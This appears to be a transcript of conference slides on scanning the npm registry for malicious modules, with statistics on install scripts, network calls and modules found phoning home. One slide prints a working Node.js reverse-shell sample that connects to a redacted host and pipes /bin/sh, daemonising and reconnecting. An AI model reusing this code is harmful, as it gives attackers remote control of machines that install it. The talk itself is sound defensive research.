hunting for malicious modules in npm - nodesummit
TRANSCRIPT
Hunting for Malicious Modules in
adam_baldwinevilpacket
liftsecurity.io
nodesecurity.ioContinous Security Monitoring
Hunting for Malicious Modules in
WHY SHOULD WE HUNT?
🕯Hey, I can publish malicious
code to npm
💨this is bad.
🔥install scripts are BAD!
💩JavaScript BAD!
rimrafall
npm hydra worm
WHAT ARE WE HUNTING?
WHAT DEFINES MALICIOUS BEHAVIOR?
var net = require('net');var daemon = require('daemon');var spawn = require('child_process').spawn;
function c() { var client = new net.Socket(); client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []); client.write("Connected\r\n"); client.pipe(sh.stdin); sh.stdout.pipe(client); });
client.on('error', function() {});
client.on('close', function() { setTimeout(c, 5000); });}
require('daemon')();c();
😈Example
client.connect(443, "REDACTED", function() { var sh = spawn('/bin/sh', []);
WHERE ARE WE HUNTING?
507,573 modules
3,443,784 individual versions
242,505,822 individual files
21,756 modules with install scripts
HOW AM I HUNTING?
MIRROR REGISTRY
INDEX MODULESFilenames Extensions Content Hash
npm install module
syscall capture
DB
npm publish GCS
PubSubInstrumentation
npm iraw data 🎉
~24,000 modules processed
2.1 TB OF DATA 😲
22 53 80
443 1880 3000
9418 23400 27017 38584 54329 61337
3001 3306 4987 6379 8000 8002
8008 8043 8080 8090 9000 9001
DESTINATION PORTS
DNS REQUESTS
339 unique lookups
DESTINATION HOSTS
1080 unique hosts
RESULTS😈
144+ modules that download build components over HTTP
Insecure Behavior
Modules that called home
et_phone_home anarchy harmlesspackage botbait
Modules that change registry settings
😇 ? 😈
😢 / 😀
WHAT DID I LEARN?How can we improve the future
People will publish malicious things to the registry
Your security habits have a lot to do with if this gets exploited or not
-Have good passwords -Don't publish credentials -Limit the # of publishers
But what about ? Can't they do something?
</presentation>Thanks
adam_baldwinevilpacket